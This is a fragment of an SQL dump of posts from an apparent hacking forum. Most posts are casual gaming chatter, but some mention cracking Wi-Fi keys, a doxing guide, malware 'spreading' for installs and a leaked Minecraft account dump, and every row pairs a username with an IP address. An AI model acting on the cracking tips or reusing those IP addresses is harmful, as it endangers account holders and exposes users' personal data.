'0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4479', '80', '190', '24', 'RE: How WiFi Security Works', '0', '257', 'XxTREYZxX', '1350132790', 'just another great HQ post by the amazing staff, keep up the good work', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0c1b7b43f9e46e5840e2a3248532b35e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4480', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '257', 'XxTREYZxX', '1350133110', 'yeah LT this is our home i love this community in the most homo-ess way ever', '203.104.11.43', '-882373845', '1', '0', '257', '1350200599', '1', 'c4aed326addcc8f9d0939ac25b24d3c7', '0', '1350200599'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4481', '848', '4435', '12', 'RE: can someone teach me how to hack a wifi connection', '0', '53', 'sirchamp', '1350135816', 'If its wep network, its very easy( copy the mac adress, paste it into the tool \"wepgen\" and you get the key ). If its a WPA or WPA2 network you will have to bruteforce into it.', '180.72.215.3', '-1270294781', '1', '0', '0', '0', '1', '203e56799522c1d6c44e60d0fca41363', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4482', '50', '132', '12', 'RE: [tut]How to DOX', '0', '53', 'sirchamp', '1350137149', 'Didnt know this. Very nice guide.', '206.202.36.17', '-825613295', '1', '0', '0', '0', '1', '5189598e99960e248b5dc3d8f515597f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4483', '851', '0', '9', 'Selling youtube views', '0', '53', 'sirchamp', '1350142176', 'I bought a pack of 25000 youtube views. I used 3000 but I dont need the rest thats why Im selling them for a discount price. Thread will be closed as soon as all the views are used up. 20K views are the maximum. Offers: 20000 views - 15$ 10000 views - likes - 15$ 10000 views - favourites - 15$ 10000 views - subscribers - 15$ 5000 views - subscribers - favourites - likes - 15$ Other offers available! Payment: Paypal. Pm me to buy This isnt really the right section but since we dont have a market section I just posted it here.', '138.90.97.195', '-1973788221', '1', '0', '53', '1350142259', '1', '86261e7ae5211785e0691d92f8771800', '0', '1350142259'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4484', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '100', '??zg???g????61', '1350144146', 'Alright, first of all this isn\'t even a cheat, second of all Indie patched this months ago -___-', '70.192.10.204', '1186990796', '1', '0', '0', '0', '1', '3dcc5fe1bd9b68e86d141f257aad346e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4485', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1350145790', 'http://l33thacking.net/thread-190-post-4444.html#pid4444', '85.230.51.22', '1441149718', '1', '0', '0', '0', '1', 'af64778cca7d29f860ef2e46a60d335c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4486', '190', '665', '56', 'RE: Copy and paste game', '0', '61', 'NXK', '1350145886', 'Greed Newest member added to the gamers group.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '93212f5eb1386df97c0377f3719a9071', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4487', '852', '0', '71', 'Whats the best game you played?', '0', '254', 'Greed', '1350148668', 'As the title says, what the best game you ever played? Mine has to be The Legend of Zelda: Ocarina of Time', '63.153.255.202', '1067057098', '1', '0', '0', '0', '1', '50a6925a166d2f0c68da9b4cc9454669', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4488', '802', '4401', '77', 'RE: MW3 Knockback Lobby | FREE', '0', '3', '??????????¢™', '1350149910', '[quote=\'treyz123456789\' pid=\'4401\' dateline=\'1350113047\'] damm i am currently on ps3, i sold my xbox last month [/quote] Aww that sucks, I like xbox better.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'c49fd9eaf24d265ae18c8ccec4fb3899', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4500', '851', '4483', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350152157', 'You are allowed to sell things, We just don\'t have a market place section ATM. Just to clear that up.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '00dbbc2d3c765553b3a34d4a47cd150c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4490', '850', '4478', '63', 'RE: anyone interested in making me a logo', '0', '62', 'R?????zo?', '1350151395', 'depends if you give me a size and colour scheme, also the name of your company or whatever and whats related to. I might do it if I have the time', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'b64431849da1e5435719e8f92055d9d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4491', '849', '4468', '73', 'RE: when did you buy you ipod', '0', '62', 'R?????zo?', '1350151432', 'i don\'t own an ipod, got an iphone though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c10a6aa15092cd702cceeb6a8ff6c4ab', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4492', '840', '4390', '4', 'RE: Its andrew', '0', '62', 'R?????zo?', '1350151465', 'Welcome bro, enjoy your stay. Be HQ and stay active :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0b1701f197c14addce1efc305e8cdb60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4493', '833', '4375', '3', 'RE: New feature coming up!', '0', '62', 'R?????zo?', '1350151518', 'Wow that sounds nice, hopefully doesnt make the hosting server lag though.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd9043ca2ac7ca5940ea7f223c2bee08b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4494', '846', '4420', '74', 'RE: another great pvp', '0', '62', 'R?????zo?', '1350151557', 'is that for minecraft or what?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1d3f81b1eacee1cf26ece57657bad110', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4495', '3', '7', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350151626', 'I have lowered the size just a little bit, That is because I actually want people to read them and see them.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '2785a0e0915185df625605633e434f5a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4496', '790', '4350', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350151681', '[quote=\'iTzIpod\' pid=\'4350\' dateline=\'1350092788\'] I\'ll apply. Do I still gotta fill out the form? Even though I was the Original Leader of Unique? [/quote] you don\'t need to apply, I will be happy to add you back. and offer you a spot as co-leader if you are interested :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '190049c2a35e1d0404bafc243db7d02a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4497', '835', '4381', '24', 'RE: Just purchased another Lappy', '0', '62', 'R?????zo?', '1350151743', 'Looks nice bro, way better then my current one :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e20043af64e93484d596f4a007532d2f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4498', '851', '4483', '9', 'RE: Selling youtube views', '0', '53', 'sirchamp', '1350152010', 'Where does it say that? I have deep respect for you beeing a moderator but as much as I know we dont have a marketplace because it would be as empty as the sahara desert^^', '170.119.188.88', '-1434993576', '1', '0', '0', '0', '1', '44df26057067e31d8b0659ce28e147a3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4499', '815', '4318', '73', 'RE: your favourite iOS games', '0', '62', 'R?????zo?', '1350152015', '[quote=\'GlowingCapes\' pid=\'4318\' dateline=\'1350037108\'] Yeah, I figured that when you saw it. Do you have any games that you like to play long-term? I need one like that, haven\'t had one in a while. [/quote] Well, I currently have: Angry Birds Plague Inc Draw Something 100 Floors 100 Exits Catch Candy Worms Crazy Golf Fruit Ninja Taco Master the Sheeps NY Nights Monopoly (lol) SimCity Deluxe Smash Cops', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '8275171c067b98532218ec991095f25d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4502', '853', '0', '59', 'My Way Of Spreading Method And Get Tons Of Installs', '0', '62', 'R?????zo?', '1350152433', 'Heres an ebook that might come handy for you. Download link: http://www.mediafire.com/view/?3prkfgqnp2ttdca', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '61b61b14fe88f66502d575db60405c1b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4503', '851', '4483', '9', 'RE: Selling youtube views', '0', '53', 'sirchamp', '1350152442', 'LOL. Ipwnaholic deleted his comment.', '186.173.105.177', '-1163040335', '1', '0', '0', '0', '1', 'c820e8b0a097eeeb1843d3c215c21646', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4504', '3', '7', '19', 'RE: Official Site Rules', '0', '61', 'NXK', '1350152885', 'So you copy and pasted Hack forums rules, Literally word for word. Wow that doesn\'t make us look like a bunch of leechers.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '744da279ebb7f2661df1638af89fa841', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4505', '851', '4503', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350153134', '[quote=\'sirchamp\' pid=\'4503\' dateline=\'1350152442\'] LOL. Ipwnaholic deleted his comment. [/quote] I deleted it, So new members who may have read that comment get the wrong idea that they aren\'t allowed to sell anything.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', 'a343d3b95cff4751690e4a8db1e75fe7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4507', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '1', 't3h jok3r', '1350153762', 'I bought it somewhere around May 2011', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '15760334b69b7ed23b0b1fc85f4d98a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4508', '852', '4487', '71', 'RE: Whats the best game you played?', '0', '1', 't3h jok3r', '1350153816', 'I played a lot of good games actually I only play the best games which are vouched by gamespot employees.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '541d8abfb7fa9e8de24987b829163eea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4509', '840', '4390', '4', 'RE: Its andrew', '0', '1', 't3h jok3r', '1350154001', 'Welcome to L33THacking and hope you enjoy your stay.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '207a21d4972ebe52a3597c9678aef259', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4510', '854', '0', '7', 'Boasting thread', '0', '53', 'sirchamp', '1350155819', 'Boast about something. ;) Ill start off. I made 35 Dollars on adfoc.us in one day Proof: [img]http://i47.tinypic.com/ifogvc.jpg[/img]', '33.48.215.4', '556848900', '1', '0', '0', '0', '1', 'a6a0341eaa36203477e91d44b9c119c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4511', '3', '4504', '19', 'RE: Official Site Rules', '0', '3', '??????????¢™', '1350156197', '[quote=\'NXK\' pid=\'4504\' dateline=\'1350152885\'] So you copy and pasted Hack forums rules, Literally word for word. Wow that doesn\'t make us look like a bunch of leechers. [/quote] These rules are old when I was one of the first admins here, when this site first started.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '3f41f7ce2fc9c875549694fbc4e515ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4512', '851', '4503', '9', 'RE: Selling youtube views', '0', '3', '??????????¢™', '1350156282', '[quote=\'sirchamp\' pid=\'4503\' dateline=\'1350152442\'] LOL. Ipwnaholic deleted his comment. [/quote] LOL no i didnt, also this is the wrong section for this anyways so it shouldnt even belong here.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'a6cd4ca9f74a1c18d607ec142110923b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4513', '854', '4510', '7', 'RE: Boasting thread', '0', '61', 'NXK', '1350156678', 'That\'s pretty crazy man.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9f36622b2ee91f713c63b7e4a67f74f6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4514', '851', '4512', '9', 'RE: Selling youtube views', '0', '61', 'NXK', '1350156940', '[quote=\'??????????¢™\' pid=\'4512\' dateline=\'1350156282\'] [quote=\'sirchamp\' pid=\'4503\' dateline=\'1350152442\'] LOL. Ipwnaholic deleted his comment. [/quote] LOL no i didnt, also this is the wrong section for this anyways so it shouldnt even belong here. [/quote] People use PPD networks on youtube videos to help make more money, So yes This is in the right section. It can benefit any PPD marketer.', '99.253.94.204', '1677549260', '1', '0', '61', '1350156958', '1', 'fbf5cd819b5361506acd307b808d64c7', '0', '1350156958'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4515', '826', '4325', '7', 'RE: L33T Hacking Tinychat Room', '0', '82', 'iTzIpod', '1350157315', 'We got a Skype Group Chat instead.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8f6c7b3f0c213c047c63f0488e5937fe', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4516', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '82', 'iTzIpod', '1350157358', 'There was a way to delete this. My friend told me how. But I forgot. Something to do with %appdata% though.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd8b6a7fc99627718959f44bc7a5bc05', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4517', '841', '4392', '71', 'RE: whats the best game ever made.', '0', '82', 'iTzIpod', '1350157390', 'Depends. Different people = different opinion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4d3d65d2dd0a2a78d1f45fe2fd5c9431', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4518', '829', '4328', '74', 'RE: Adventure Quest Worlds', '0', '82', 'iTzIpod', '1350157460', 'That\'s AdventureQuest you guys are talking about. There is a new game out called AdventureQuest Worlds I would like to be a member :3 If you upgrade me, I\'ll love you <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b830d5fe1973b32a3b97a958958c9f70', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4519', '569', '2813', '74', 'RE: 21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1350157505', 'You\'re welcome. :D Glad to see someone saying thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '19569b07f99c576cd7177c34f697652a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4520', '428', '1942', '74', 'RE: Dark Steam | Free Steam Games', '0', '82', 'iTzIpod', '1350157556', 'Links may be broken. Images are broken. No time to fix.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'eabe53ab31429507e8adc6eeab426efb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4521', '619', '3008', '34', 'RE: [Photoshop CS5] How to make a logo', '0', '82', 'iTzIpod', '1350157604', 'Lool. You didn\'t even rep me -.- Thanks for posting on it I guess..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0175bd87342112df05ed3d19a7cf615d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4522', '847', '4425', '76', 'RE: add me on ps3', '0', '82', 'iTzIpod', '1350157635', 'You should add me on instead. I can only play on weekends though. PSN is in Signature.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'c5e485463d622693021c03db3cf152a6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4523', '845', '4419', '72', 'RE: whats better ps3 or xbox', '0', '82', 'iTzIpod', '1350157694', 'I like PS3 way better. Reasons: It only does everything. ;P', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '52f381addd238057252818c2f8d368a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4524', '517', '2564', '34', 'RE: Spiderman Signature Tutorial', '0', '82', 'iTzIpod', '1350157725', 'Not going to try this. I got no time. Thanks Treyz.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '362dba092d3f2264132f05442ed7719b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4525', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1350157785', 'I still got more posts than t3h jok3r? Dang. I was gone for like 3 days. :p I can get like 100+ posts/day...', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7867aa9c6a2e7cd8b1489dc5ef2346a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4526', '844', '4418', '73', 'RE: TEMPLE RUN CHEAT (UNLIMITED RUN)', '0', '82', 'iTzIpod', '1350157855', 'No. It actually still works for me. :D You\'re probably just doing it wrong?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '33a4b8b202403bdda4b8b35cce7da272', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4527', '190', '665', '56', 'RE: Copy and paste game', '0', '82', 'iTzIpod', '1350157916', 'http://l33thacking.net/thread-190-page-9.html xD', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7cf44bb83aa27451cc0aad1bc2e7e803', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4528', '833', '4375', '3', 'RE: New feature coming up!', '0', '82', 'iTzIpod', '1350157946', 'Not looking forward to this feature. No. No.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '63a8807e128fa9f085a85d16dd520363', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4529', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1350157977', 'I\'m interested. :D Hook me up please. I just wanna see how my group is doing.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '837400416f866c3764a2845ad9bfcede', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4530', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1350158007', 'I\'ve added you to the group.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'e809eb363618bf8bb0ce971b5c884ee5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4531', '849', '4468', '73', 'RE: when did you buy your ipod', '0', '82', 'iTzIpod', '1350158013', 'I bought my first Ipod in 2010. But then I upgraded it each time a new one came out.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fd346ff9c8478361944187e0862d6fc0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, 